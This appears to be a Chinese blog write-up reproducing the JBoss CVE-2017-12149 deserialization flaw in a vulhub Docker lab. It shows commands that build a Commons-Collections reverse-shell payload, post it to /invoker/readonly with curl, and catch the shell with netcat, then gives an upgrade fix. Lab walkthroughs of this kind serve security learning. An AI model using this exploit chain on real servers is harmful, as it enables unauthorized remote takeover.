漏洞復現-CVE-2017-12149-jboss反序列化
阿新 • • 發佈:2021-09-07
0x00 實驗環境
攻擊機:Win 10
靶場:docker拉的vulhub靶場
0x01 影響版本
實驗版本jboss:as-6.1.0,對版本低於7.x的有影響,即:5.x和6.x版本
0x02 漏洞復現
(1)存在漏洞的頁面:
http://x.x.x.x:8080/invoker/readonly
(2)說是這裡存在反序列化,不太懂java程式碼,等以後學了這個再看看吧。
序列化: FileOutputStream fos = new FileOutputStream(file); ObjectOutputStream oos = new ObjectOutputStream(fos); oos.writeObject(st);
反序列化:
FileInputStream fis = new FileInputStream(file);
ObjectInputStream ois = new ObjectInputStream(fis);
Student st1 = (Student) ois.readObject();
(3)兩種拿許可權方式:
方式一:
直接使用現有的工具:
方式二:
使用反序列化:
(1)下載工具(工具一概不提供,本人堅決反對利用教學方法進行犯罪的行為,一切犯罪行為必將受到嚴懲,綠色網路需要我們共同維護,更推薦大家瞭解它們背後的原理,更好地進行防護。禁止任何人轉載到其他站點,禁止用於任何非法用途。如有任何人憑此做何非法事情,均於筆者無關,特此宣告。 ):
(2)生成一個ser的exp:
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap ip:2333
(3)執行攻擊:
curl http://xx.xx.xx.xx:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
(4)2333埠開啟監聽後將收到shell:
nc -lvp 2333
0x03 漏洞修復
1、升級jboss為7.x版本